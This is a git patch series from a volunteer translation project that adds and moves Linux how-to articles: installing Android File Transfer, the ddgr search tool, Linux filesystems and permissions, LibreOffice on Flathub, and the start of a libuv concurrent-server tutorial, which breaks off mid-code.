根据[罗伯特·哈夫2018年技术人才薪资导览][8],预计2018年北美地区许多单位将聘请大量系统管理方面的专业人才。同时,个人软实力和领导力水平也是优秀人才的考量因素,并且越来越受到重视。 + + 报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,同时,也是IT从业者的重要技能,特别是从事服务台和桌面支持的技术人员。” + + [Linux基金会][9] *译注* 提出不同阶段的系统管理员的所需的基本技能,都包括了强大的分析能力和快速处理问题的能力。 + + 当一个系统管理员想逐渐爬上金字塔顶端,他应该还具备如下技能:系统配置的结构化方法充满兴趣,拥有解决安全问题的经验,用户身份(验证)管理的经验,与非技术人员进行非技术交流的能力,优化系统以满足最新的安全需求的能力。 + + 现在[下载][10]2017年开源工作报告。 + + + + + +----------------------- + +via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins + +作者:[ ][a] +译者:[wangy325](https://github.com/wangy325) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx +[4]:https://www.redhat.com/en/services/certification/rhce +[5]:https://www.redhat.com/en/services/certification/rhcsa +[6]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 +[7]:https://opensource.com/article/17/7/truth-about-sysadmins +[8]:https://www.roberthalf.com/salary-guide/technology +[9]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 +[10]:http://bit.ly/2017OSSjobsreport \ No newline at end of file From f1c0ef8dbd050b8b8351e6929ddcaa5a5b74e9ff Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Thu, 30 Nov 2017 22:35:30 +0800 Subject: [PATCH 0091/1627] 20171124 How to Install Android File Transfer for Linux.md (#6399) * Create 20171124 How to Install Android File Transfer for Linux.md * Delete 20171124 How to Install Android File Transfer for Linux.md --- ...Install Android File Transfer for Linux.md | 80 ------------------ ...Install Android File Transfer for Linux.md | 82 +++++++++++++++++++ 2 files changed, 82 insertions(+), 80 deletions(-) delete mode 100644 sources/tech/20171124 How to Install Android File Transfer for Linux.md create mode 100644 translated/tech/20171124 How to Install Android File Transfer for Linux.md diff --git a/sources/tech/20171124 How to Install Android File Transfer for Linux.md b/sources/tech/20171124 How to Install Android File Transfer for Linux.md deleted file mode 100644 index 4a9e04b49a..0000000000 --- a/sources/tech/20171124 How to Install Android File Transfer for Linux.md +++ /dev/null @@ -1,80 +0,0 @@ -Translating by wenwensnow -# How to Install Android File Transfer for Linux - -If you’re struggling to mount your Android phone on Ubuntu you might want to give [Android File Transfer for Linux][4] a try. - -Effectively it’s a clone of Google’s [Android File Transfer][6] app for macOS. It’s built with Qt, and has a super simple UI that makes it easy to transfer files and folders to and from your Android smartphone and your Ubuntu machine. - -Now, chances are a few of you will be scratching your head wondering what this app does that Nautilus, the default file manager in Ubuntu, doesn’t — and the answer is nothing. - -When I connect my Nexus 5X (and remember to select the [MTP][7] option) to my Ubuntu machine I can browse, open and manage it using Nautilus, just like my phone was a regular USB drive thanks to [GVfs][8]: - - [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] - -But  _some_  people experience issues with this, and other MTP implementations, such as directories not loading, directory creation that doesn’t “stick”, and issues using their device inside a media player. - -And it’s for those people whom Android File Transfer for Linux is designed. Consider it an alternative to other methods of mounting MTP devices on Linux. If what you use currently works a-ok, you probably don’t need to try this out (unless you really like trying things out). - -![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) - -The app features: - -* A straightforward user interface - -* Drag and drop support (Linux to Phone) - -* Batch downloading (Phone to Linux) - -* Transfer progress dialogs - -* FUSE wrapper - -* No file size limits - -* Optional CLI tool - -### Install Android File Transfer on Ubuntu - -That’s enough waffle about this alternative way to mount your Android phone, on to the nitty gritty of installing it. - -Helpfully there’s a [PPA available][10] which provides builds for Ubuntu 14.04 LTS, 16.04 LTS and Ubuntu 17.10. - -To add the PPA to your list of software sources run this command: - -``` -sudo add-apt-repository ppa:samoilov-lex/aftl-stable -``` - -Then, to install Android File Transfer for Linux on Ubuntu, run: - -``` -sudo apt-get update && sudo apt install android-file-transfer -``` - -That’s pretty much it. - -You’ll find a launcher for the app in your app menu. - -Before launching it do make make sure that no other devices (such as Nautilus) mount your phone first. If anything is using it the app will report “no MTP device found”. To fix, unmount your device from Nautilus (or whichever app is using it) then relaunch Android File Transfer. - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux - -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/app -[3]:http://www.omgubuntu.co.uk/category/download -[4]:https://github.com/whoozle/android-file-transfer-linux -[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux -[6]:http://android.com/filetransfer?linkid=14270770 -[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol -[8]:https://en.wikipedia.org/wiki/GVfs -[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg -[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable diff --git a/translated/tech/20171124 How to Install Android File Transfer for Linux.md b/translated/tech/20171124 How to Install Android File Transfer for Linux.md new file mode 100644 index 0000000000..b93429f509 --- /dev/null +++ b/translated/tech/20171124 How to Install Android File Transfer for Linux.md @@ -0,0 +1,82 @@ +Translating by wenwensnow + +# 如何在Linux下安装安卓文件传输助手 + +如果你尝试在Ubuntu下安装你的安卓手机,你也许可以试试Linux下的安卓文件传输助手 + +本质上来说,这个应用是谷歌mac版本的一个复制。它是用Qt编写的,用户界面非常简洁,使得你能轻松在Ubuntu和安卓手机之间传输文件。 + +现在,有可能一部分人想知道有什么是这个应用可以做,而Nautilus(Ubuntu默认的文件资源管理器)不能做的,答案是没有。 + +当我将我的 Nexus 5X(记得选择[MTP][7] 选项)连接在Ubuntu上时,在[GVfs][8](Gnome桌面下的虚拟文件系统)的帮助下,我可以打开,浏览和管理我的手机, 就像它是一个普通的U盘一样。 + + [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] + +但是一些用户在使用默认的文件管理器时,在MTP的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 + +这就是要为Linux系统用户设计一个安卓文件传输助手应用的原因。将这个应用当做将MTP设备安装在Linux下的另一种选择。如果你使用Linux下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 + + +![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) + +app特点: + +*   简洁直观的用户界面 + +*   支持文件拖放功能(从Linux系统到手机) + +*   支持批量下载 (从手机到Linux系统) + +*   显示传输进程对话框 + +*   FUSE模块支持 + +*   没有文件大小限制 + +*   可选命令行工具 + +### Ubuntu下安装安卓手机文件助手的步骤 + +以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 + +这有一个[PPA](个人软件包集)源为Ubuntu 14.04 LTS(长期支持版本),16.04LTS 和 Ubuntu17.10 提供可用应用 + +为了将这一PPA加入你的软件资源列表中,执行这条命令: + +``` +sudo add-apt-repository ppa:samoilov-lex/aftl-stable +``` + +接着,为了在Ubuntu下安装Linux版本的安卓文件传输助手,执行: + +``` +sudo apt-get update && sudo apt install android-file-transfer +``` + +这样就行了。 + +你会在你的应用列表中发现这一应用的启动图标。 + +在你启动这一应用之前,要确保没有其他应用(比如Nautilus)已经加载了你的手机.如果其他应用正在使用你的手机,就会显示“无法找到MTP设备”。为了解决这一问题,将你的手机从Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux + +作者:[ JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/app +[3]:http://www.omgubuntu.co.uk/category/download +[4]:https://github.com/whoozle/android-file-transfer-linux +[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux +[6]:http://android.com/filetransfer?linkid=14270770 +[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol +[8]:https://en.wikipedia.org/wiki/GVfs +[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg +[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable From eb30eb0a270444e7165022ee97ede5e654097b34 Mon Sep 17 00:00:00 2001 From: Ezio Date: Thu, 30 Nov 2017 22:44:44 +0800 Subject: [PATCH 0092/1627] =?UTF-8?q?20171130-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Search DuckDuckGo from the Command Line.md | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 sources/tech/20171130 Search DuckDuckGo from the Command Line.md diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md new file mode 100644 index 0000000000..a54c292924 --- /dev/null +++ b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -0,0 +1,101 @@ +# Search DuckDuckGo from the Command Line + + ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) +When we showed you how to [search Google from the command line][3] a lot of you to say you use [Duck Duck Go][4], the awesome privacy-focused search engine. + +Well, now there’s a tool to search DuckDuckGo from the command line. It’s called [ddgr][6] (pronounced, in my head, as  _dodger_ ) and it’s pretty neat. + +Like [Googler][7], ddgr is totally open-source and totally unofficial. Yup, the app is unaffiliated with DuckDuckGo in any way. So, should it start returning unsavoury search results for innocent terms, make sure you quack in this dev’s direction, and not the search engine’s! + +### DuckDuckGo Terminal App + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) + +[DuckDuckGo Bangs][8] makes finding stuff on DuckDuckGo super easy (there’s even a bang for  _this_  site) and, dutifully, ddgr supports them. + +Unlike the web interface, you can specify the number of search results you would like to see per page. It’s more convenient than skimming through 30-odd search results per page. The default interface is carefully designed to use minimum space without sacrificing readability. + +`ddgr` has a number of features, including: + +* Choose number of search results to fetch + +* Support for Bash autocomplete + +* Use !bangs + +* Open URLs in a browser + +* “I’m feeling lucky” option + +* Filter by time, region, file type, etc + +* Minimal dependencies + +You can download `ddgr` for various systems direct from the Github project page: + +[Download ‘ddgr’ from Github][9] + +You can also install ddgr on Ubuntu 16.04 LTS and up from a PPA. This repo is maintained by the developer of ddgr and is recommended should you want to stay up-to-date with new releases as and when they appear. + +Do note that at the time of writing the latest version of ddgr is  _not_  in the PPA, but an older version (lacking –num support) is: + +``` +sudo add-apt-repository ppa:twodopeshaggy/jarun +``` + +``` +sudo apt-get update +``` + +### How To Use ddgr to Search DuckDuckGo from the Comand Line + +To use ddgr once you installed all you need to do is pop open your terminal emulator of choice and run: + +``` +ddgr +``` + +Next enter a search term: + +``` +search-term +``` + +To limit the number of results returned run: + +``` +ddgr --num 5 search-term +``` + +To instantly open the first matching result for a search term in your browser run: + +``` +ddgr -j search-term +``` + +You can pass arguments and flags to narrow down your search. To see a comprehensive list inside the terminal run: + +``` +ddgr -h +``` + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app + +作者:[JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/download +[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line +[4]:http://duckduckgo.com/ +[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app +[6]:https://github.com/jarun/ddgr +[7]:https://github.com/jarun/googler +[8]:https://duckduckgo.com/bang +[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 From 5e90fa5893d4af56110960e92941370be4adf641 Mon Sep 17 00:00:00 2001 From: Ezio Date: Thu, 30 Nov 2017 22:46:39 +0800 Subject: [PATCH 0093/1627] =?UTF-8?q?20171130-2=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ng to Linux Disks Files and Filesystems.md | 135 ++++++++++++++++++ 1 file changed, 135 insertions(+) create mode 100644 sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md diff --git a/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md new file mode 100644 index 0000000000..5227d5f16e --- /dev/null +++ b/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md @@ -0,0 +1,135 @@ +Migrating to Linux: Disks, Files, and Filesystems +============================================================ + +![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ") +Installing and using Linux on your main desktop will help you quickly become familiar with the methods and tools you need.[Creative Commons Zero][1]Pixabay + +This is the second article in our series on migrating to Linux. If you missed the first one, [you can find it here][4]. As mentioned previously, there are several reasons why you might want to migrate to Linux. You might be using or developing code for Linux in your job, or you might just want to try something new. + +In any case, having Linux on your main desktop will help you quickly become familiar with the methods and tools you’ll need. In this article, I’ll provide an introduction to Linux files, filesystems and disks. + +### Where's My C:\? + +If you are coming from a Mac, Linux should feel fairly familiar to you, as the Mac uses files, filesystems, and disks pretty closely to the way Linux does. On the other hand, if your experience is primarily Windows, accessing disks under Linux may seem a little confusing. Generally, Windows assigns a drive letter (like C:\) to each disk. Linux does not do this. Instead Linux presents a single hierarchy of files and directories for everything in your system. + +Let's look at an example. Suppose you use a computer with a main hard drive, a CD-ROM with folders called  _Books_  and  _Videos_  and a USB thumb drive with a directory called  _Transfer_ . Under Windows, you would see the following: + +``` +C:\ [Hard drive] + +├ System + +├ System32 + +├ Program Files + +├ Program Files (x86) + +└ + +D:\ [CD-ROM] + +├ Books + +└ Videos + +E:\ [USB thumb drive] + +└ Transfer +``` + +A typical Linux system would instead have this: + +``` +/ (the top most directory, called the root directory) [Hard drive] + +├ bin + +├ etc + +├ lib + +├ sbin + +├ usr + +├ + +└ media + + └ + + ├ cdrom [CD-ROM] + + │ ├ Books + + │ └ Videos + + └ Kingme_USB [USB thumb drive] + + └ Transfer +``` + +If you are using a graphical environment, usually, the file manager in Linux will present the CD-ROM and the USB thumb drive with icons that look like the device, so you may not need to know the media's specific directory. + +### Filesystems + +Linux emphasizes these things called filesystems. A filesystem is a set of structures on media (like a hard drive) that keep track of all the files and directories on the media. Without a filesystem we could store information on a hard drive, but all the data would be in a jumbled mess. We wouldn't know which blocks of data belonged to which file. You may have heard of names like Ext4, XFS, and Btrfs. These are Linux filesystem types. + +Every type of media that holds files and directories has a filesystem on it. Different media types may use specific filesystem types that are optimized for the media. So CD-ROMs use ISO9660 or UDF filesystem types. USB thumbdrives typically use FAT32 so they can be easily shared with other computer systems. + +Windows uses filesystems, too. It just doesn't talk about them as much. For example, when you insert a CD-ROM, Windows will read the ISO9660 filesystem structures, assign a drive letter to it and display the files and directories under the letter (D:\ for example). So if you're picky about details, technically Windows assigns a drive letter to a filesystem, not the whole disk. + +Using that same example, Linux will also read the ISO9660 filesystem structures, but instead of a drive letter, it will attach the filesystem to a directory (a process called mounting). Linux will then display the files and directories on the CD-ROM under the attached directory ( _/media//cdrom,_  for example). + +So to answer the question "Where's my C:\?" On Linux, there is no C:\. It works differently. + +### Files + +Windows stores files and directories (also called folders) in its filesystem. Linux, however, lets you put other things into the filesystem as well. These additional types of things are native objects in the filesystem, and they're actually different from regular files. Linux allows you to create and use hard links, symbolic links, named pipes, device nodes, and sockets, in addition to the regular files and directories. We won't get into all the types of filesystem objects here, but there are a few that are useful to know about. + +Hard links are used to create one or more aliases for a file. Each alias is a different name to the same contents on disk. If you edit the file under one file name, the changes appear under the other file names as well. For example. you might have  _MyResume_2017.doc_  also have a hard link called  _JaneDoeResume.doc_ . (Note that you can create a hard link by using the _ln_  command from the command line.) This way you can find and edit  _MyResume_2017.doc_ , then send out  _JaneDoeResume.doc_  to your prospects to help them keep track where it's from -- which will contain all your updates. + +Symbolic links are a little like Windows shortcuts. The filesystem entry contains a path to another file or directory. In a lot of ways, they work like hard links in that they can create an alias to another file. However, symbolic links can alias directories as well as files, and symbolic links can refer to items in a different filesystem on different media where hard links cannot. (Note that you can create symbolic links also with the _ln_ command, but with the  _-s_ option.) + +### Permissions + +Another big difference between Windows and Linux involves the permissions on filesystem objects (files, directories, and others). Windows implements a fairly complex set of permissions on files and directories. For example, users and groups can have permissions to read, write, execute, modify, and more. Users and groups can be given permission to access everything in a directory with exceptions, or they can be given no permission to anything in a directory with exceptions. + +Most folks using Windows don't make use of special permissions, however; so, it's surprising when they discover that a default set of permissions are used and enforced on Linux. Linux can enforce more sophisticated permissions by using SELinux or AppArmor. However most Linux installations just use the built-in default permissions. + +In the default permissions, each item in the filesystem has a set of permissions for the owner of the file, the group for the file, and for everyone else. These permissions allow for: reading, writing, and executing. The permissions have a hierarchy to them. First, it checks whether the user (the login name) is the owner and has permission. If not, then it checks whether your user (login name) is in the group for the file and the group has permission. If not, then it checks whether everyone else has permission. There are other permission settings as well, but the three sets of three are the ones most commonly used. + +If you are using the command line, and you type ls -l, you may see permissions represented as: + +``` +rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh +``` + +The letters at the beginning, rwxrw-r--, show the permissions. In this case, the owner (stan) can read, write, and execute the file (the first three letters, rwx); members of the group dndgrp can read and write the file but not execute (the second three letters, rw-); and everyone else can only read the file (the last three letters, r--). + +(Note that on Windows to make a script executable, you make the file's extension something specific, .bat for example. On Linux, the file's extension doesn't mean anything to the operating system. Instead its permissions need to be set so the file is executable.) + +If you get a  _permission denied_  error, chances are you are attempting to run a program or command that requires administrator privilege, or you're trying to access a file that doesn't hold permissions for your user account to access it. If you are trying to do something that requires administrator privilege, you will need to switch to the user account called  _root_  by logging in as root, or by using a helper program called  _sudo_  on the command line, which will allow you to temporarily run as root. The sudo tool will, of course, ask for a password to make sure you really should have permission. + +### Hard Drive Filesystems + +Windows predominately uses a filesystem type called NTFS for hard drives. On Linux, you get to pick which type of filesystem you want to use for the hard drive. Different types of filesystems exhibit different features and different performance characteristics. The main native Linux filesystem used today is Ext4\. However, you can choose from an abundance of filesystem types at installation time, such as: Ext3 (predecessor to Ext4), XFS, Btrfs, UBIFS (for embedded systems), and more. If you're not sure which one to use, Ext4 will work great. + + _Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems + +作者:[JOHN BONESIO][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/johnbonesio +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[3]:https://www.linux.com/files/images/butterflies-8075511920jpg +[4]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction From 44c0562a198475f7ba840ea3fc3ea448010bb8d8 Mon Sep 17 00:00:00 2001 From: Ezio Date: Thu, 30 Nov 2017 22:51:49 +0800 Subject: [PATCH 0094/1627] =?UTF-8?q?20171130-3=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ilable on Flathub the Flatpak App Store.md | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md diff --git a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md new file mode 100644 index 0000000000..1f8dde5784 --- /dev/null +++ b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @@ -0,0 +1,70 @@ +# LibreOffice Is Now Available on Flathub, the Flatpak App Store + +![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) + +LibreOffice is now available to install from [Flathub][3], the centralised Flatpak app store. + +Its arrival allows anyone running a modern Linux distribution to install the latest stable release of LibreOffice in a click or two, without having to hunt down a PPA, tussle with tarballs or wait for a distro provider to package it up. + +A [LibreOffice Flatpak][5] has been available for users to download and install since August of last year and the [LibreOffice 5.2][6] release. + +What’s “new” here is the distribution method. Rather than release updates through their own dedicated server The Document Foundation has opted to use Flathub. + +This is  _great_  news for end users as it means there’s one less repo to worry about adding on a fresh install, but it’s also good news for Flatpak advocates too: LibreOffice is open-source software’s most popular productivity suite. Its support for both format and app store is sure to be warmly welcomed. + +At the time of writing you can install LibreOffice 5.4.2 from Flathub. New stable releases will be added as and when they’re released. + +### Enable Flathub on Ubuntu + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) + +Fedora, Arch, and Linux Mint 18.3 users have Flatpak installed, ready to go, out of the box. Mint even comes with the Flathub remote pre-enabled. + +[Install LibreOffice from Flathub][7] + +To get Flatpak up and running on Ubuntu you first have to install it: + +``` +sudo apt install flatpak gnome-software-plugin-flatpak +``` + +To be able to install apps from Flathub you need to add the Flathub remote server: + +``` +flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo +``` + +That’s pretty much it. Just log out and back in (so that Ubuntu Software refreshes its cache) and you  _should_  be able to find any Flatpak apps available on Flathub through the Ubuntu Software app. + +In this instance, search for “LibreOffice” and locate the result that has a line of text underneath mentioning Flathub. (Do bear in mind that Ubuntu has tweaked the Software client to shows Snap app results above everything else, so you may need scroll down the list of results to see it). + +There is a [bug with installing Flatpak apps][8] from a flatpakref file, so if the above method doesn’t work you can also install Flatpak apps form Flathub using the command line. + +The Flathub website lists the command needed to install each app. Switch to the “Command Line” tab to see them. + +#### More apps on Flathub + +If you read this site regularly enough you’ll know that I  _love_  Flathub. It’s home to some of my favourite apps (Corebird, Parlatype, GNOME MPV, Peek, Audacity, GIMP… etc). I get the latest, stable versions of these apps (plus any dependencies they need) without compromise. + +And, as I tweeted a week or so back, most Flatpak apps now look great with GTK themes — no more [workarounds][9]required! + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store + +作者:[ JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/news +[3]:http://www.flathub.org/ +[4]:http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store +[5]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[6]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[7]:https://flathub.org/repo/appstream/org.libreoffice.LibreOffice.flatpakref +[8]:https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1716409 +[9]:http://www.omgubuntu.co.uk/2017/05/flatpak-theme-issue-fix From 31f640e100ceefaa92750c5dc03e4ad87148f186 Mon Sep 17 00:00:00 2001 From: Ezio Date: Thu, 30 Nov 2017 22:59:10 +0800 Subject: [PATCH 0095/1627] =?UTF-8?q?20171130-4=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1109 Concurrent Servers- Part 4 - libuv.md | 492 ++++++++++++++++++ 1 file changed, 492 insertions(+) create mode 100644 sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md diff --git a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md new file mode 100644 index 0000000000..a41fc008fa --- /dev/null +++ b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -0,0 +1,492 @@ +[Concurrent Servers: Part 4 - libuv][17] +============================================================ + +This is part 4 of a series of posts on writing concurrent network servers. In this part we're going to use libuv to rewrite our server once again, and also talk about handling time-consuming tasks in callbacks using a thread pool. Finally, we're going to look under the hood of libuv for a bit to study how it wraps blocking file-system operations with an asynchronous API. + +All posts in the series: + +* [Part 1 - Introduction][7] + +* [Part 2 - Threads][8] + +* [Part 3 - Event-driven][9] + +* [Part 4 - libuv][10] + +### Abstracting away event-driven loops with libuv + +In [part 3][11], we've seen how similar select-based and epoll-based servers are, and I mentioned it's very tempting to abstract away the minor differences between them. Numerous libraries are already doing this, however, so in this part I'm going to pick one and use it. The library I'm picking is [libuv][12], which was originally designed to serve as the underlying portable platform layer for Node.js, and has since found use in additional projects. libuv is written in C, which makes it highly portable and very suitable for tying into high-level languages like JavaScript and Python. + +While libuv has grown to be a fairly large framework for abstracting low-level platform details, it remains centered on the concept of an  _event loop_ . In our event-driven servers in part 3, the event loop was explicit in the main function; when using libuv, the loop is usually hidden inside the library itself, and user code just registers event handlers (as callback functions) and runs the loop. Furthermore, libuv will use the fastest event loop implementation for a given platform: for Linux this is epoll, etc. + +![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png) + +libuv supports multiple event loops, and thus an event loop is a first class citizen within the library; it has a handle - uv_loop_t, and functions for creating/destroying/starting/stopping loops. That said, I will only use the "default" loop in this post, which libuv makes available via uv_default_loop(); multiple loops are mosly useful for multi-threaded event-driven servers, a more advanced topic I'll leave for future parts in the series. + +### A concurrent server using libuv + +To get a better feel for libuv, let's jump to our trusty protocol server that we've been vigorously reimplementing throughout the series. The structure of this server is going to be somewhat similar to the select and epoll-based servers of part 3, since it also relies on callbacks. The full [code sample is here][13]; we start with setting up the server socket bound to a local port: + +``` +int portnum = 9090; +if (argc >= 2) { + portnum = atoi(argv[1]); +} +printf("Serving on port %d\n", portnum); + +int rc; +uv_tcp_t server_stream; +if ((rc = uv_tcp_init(uv_default_loop(), &server_stream)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); +} + +struct sockaddr_in server_address; +if ((rc = uv_ip4_addr("0.0.0.0", portnum, &server_address)) < 0) { + die("uv_ip4_addr failed: %s", uv_strerror(rc)); +} + +if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0)) < 0) { + die("uv_tcp_bind failed: %s", uv_strerror(rc)); +} +``` + +Fairly standard socket fare here, except that it's all wrapped in libuv APIs. In return we get a portable interface that should work on any platform libuv supports. + +This code also demonstrates conscientious error handling; most libuv functions return an integer status, with a negative number meaning an error. In our server we treat these errors as fatals, but one may imagine a more graceful recovery. + +Now that the socket is bound, it's time to listen on it. Here we run into our first callback registration: + +``` +// Listen on the socket for new peers to connect. When a new peer connects, +// the on_peer_connected callback will be invoked. +if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected)) < 0) { + die("uv_listen failed: %s", uv_strerror(rc)); +} +``` + +uv_listen registers a callback that the event loop will invoke when new peers connect to the socket. Our callback here is called on_peer_connected, and we'll examine it soon. + +Finally, main runs the libuv loop until it's stopped (uv_run only returns when the loop has stopped or some error occurred). + +``` +// Run the libuv event loop. +uv_run(uv_default_loop(), UV_RUN_DEFAULT); + +// If uv_run returned, close the default loop before exiting. +return uv_loop_close(uv_default_loop()); +``` + +Note that only a single callback was registered by main prior to running the event loop; we'll soon see how additional callbacks are added. It's not a problem to add and remove callbacks throughout the runtime of the event loop - in fact, this is how most servers are expected to be written. + +This is on_peer_connected, which handles new client connections to the server: + +``` +void on_peer_connected(uv_stream_t* server_stream, int status) { + if (status < 0) { + fprintf(stderr, "Peer connection error: %s\n", uv_strerror(status)); + return; + } + + // client will represent this peer; it's allocated on the heap and only + // released when the client disconnects. The client holds a pointer to + // peer_state_t in its data field; this peer state tracks the protocol state + // with this client throughout interaction. + uv_tcp_t* client = 